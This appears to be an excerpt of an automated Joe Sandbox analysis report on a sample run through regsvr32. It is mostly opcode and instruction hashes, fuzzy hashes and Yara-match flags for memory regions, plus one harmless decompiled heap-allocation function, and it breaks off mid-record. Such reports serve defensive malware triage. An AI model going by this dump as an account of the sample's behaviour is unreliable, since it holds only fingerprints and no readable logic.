                                                                                                                                                                                                                    • String ID: 8=
                                                                                                                                                                                                                    • API String ID: 0-237953557
                                                                                                                                                                                                                    • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                                    • Instruction ID: 257820274941b793f9062d3d7479f4025f21c2971fba420e536bca53fd241485
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26313870208B458BDB5CDF28C49916ABBE2FBD9300F444A2EE58AD7365DB34D845CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: K
                                                                                                                                                                                                                    • API String ID: 0-425913083
                                                                                                                                                                                                                    • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                                    • Instruction ID: 296962209015779c260dbbfd3f6fcbc7b0f179a60c3f0e235df714bffa56f1b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241F7B180438E8FDB48CF68D8864DE7BB0FB58344F114A19E866A6250D3B8D665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t"
                                                                                                                                                                                                                    • API String ID: 0-2131657386
                                                                                                                                                                                                                    • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                                    • Instruction ID: 2036fc80bed8581eb256a563d12435ad61674c761f595b219ce3232b4b56ef46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB41D67180070D8BDF48DF64C48A0DE7FB1FB083A8F65621DE81AB6290D3B89585CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gLv
                                                                                                                                                                                                                    • API String ID: 0-1669999040
                                                                                                                                                                                                                    • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                                    • Instruction ID: 77e2cbfe16261280557156def126e7d76b7e928e2358fa3e78c372d969d84a96
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B41A0B190078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2|
                                                                                                                                                                                                                    • API String ID: 0-4112153497
                                                                                                                                                                                                                    • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                                    • Instruction ID: 0ad9df4468e4ead2b109d099e0477daa9d28cdccb04351be0cebb410f93d8c3c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631E2715083808FD7A8DF28C58A54BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: v)v
                                                                                                                                                                                                                    • API String ID: 0-2248367734
                                                                                                                                                                                                                    • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                                    • Instruction ID: 439a5abff07f1861eee82d91a942acd1efc3af3e81beae5d1c15170acd9c79c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F031F170D107189BDF88DFB8D98A4DDBBF0BB48308F50821DD816B6290D7785A45CF68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: b
                                                                                                                                                                                                                    • API String ID: 0-1908338681
                                                                                                                                                                                                                    • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                                    • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                    • API String ID: 0-579211002
                                                                                                                                                                                                                    • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                                    • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0}
                                                                                                                                                                                                                    • API String ID: 0-2955618701
                                                                                                                                                                                                                    • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                                    • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 6N
                                                                                                                                                                                                                    • API String ID: 0-1503784733
                                                                                                                                                                                                                    • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                                    • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: S}
                                                                                                                                                                                                                    • API String ID: 0-4277866985
                                                                                                                                                                                                                    • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                                    • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: H-
                                                                                                                                                                                                                    • API String ID: 0-1037293833
                                                                                                                                                                                                                    • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                                    • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: u*AR
                                                                                                                                                                                                                    • API String ID: 0-611844632
                                                                                                                                                                                                                    • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                                    • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g*`
                                                                                                                                                                                                                    • API String ID: 0-1142845859
                                                                                                                                                                                                                    • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                                    • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 5$
                                                                                                                                                                                                                    • API String ID: 0-3756733592
                                                                                                                                                                                                                    • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                                    • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: n*=
                                                                                                                                                                                                                    • API String ID: 0-1578461029
                                                                                                                                                                                                                    • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                                    • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000A878(long long __rax) {
                                                                                                                                                                                                                    				signed int _t3;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t3 = GetProcessHeap();
                                                                                                                                                                                                                    				 *0x800227e8 = __rax;
                                                                                                                                                                                                                    				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                    0x18000a87c
                                                                                                                                                                                                                    0x18000a885
                                                                                                                                                                                                                    0x18000a893

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                    • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                                    • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                                    • Instruction ID: 0c0d8431529df70554160c9925138e8f75e60902a8141db67226bc1ff44aea61
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E10570E0460ACFDF58DFA8D59A8AEBBB7FB44348F004159D806E72A0D774AA15CBC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                                    • Instruction ID: 5f70f6f8ce3295ae6a8ec2074616d26221d4769e90a22f92d30d06d8fe8cf300
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8C1CEB9903609CFDB68DF38C49A59D3BF1AF64308F204119EC269A2A6D774D529CB48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                                    • Instruction ID: c5fc193e322ca83bfbb71f4ac42c37ea5f20326c2055330720a6624e858f66f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFB12770E04B089FDFA8DFA8D48A9DEBBF2FB45344F00451DE446A7290D7B8591ACB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                                    • Instruction ID: 3073faf71936e83e92589bff2f51c19fa2bf61840ae1a9e4268b8f9d85e7346c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67B1F7716087C88FDBBECF24C8896DA3BA9FB46708F50421DE9CA8E254DB745745CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                                    • Instruction ID: 0430a096e17b40a33060fd92e9f3eda1603b3128b6831848b0b2250b5a603301
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF813D70D48709DFCB58DFA8C49599EBBF1FB44344F00856EE849EB290DB749A09CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                                    • Instruction ID: c4d70c164ab7f7b58cdf19a31354ae3de7da62dca67f27fe62d205d8e9e47698
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF8127B051074D9BDF88DF28C8C99DD7BB1FB483A8FA56218FC0AA6254D774D885CB84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
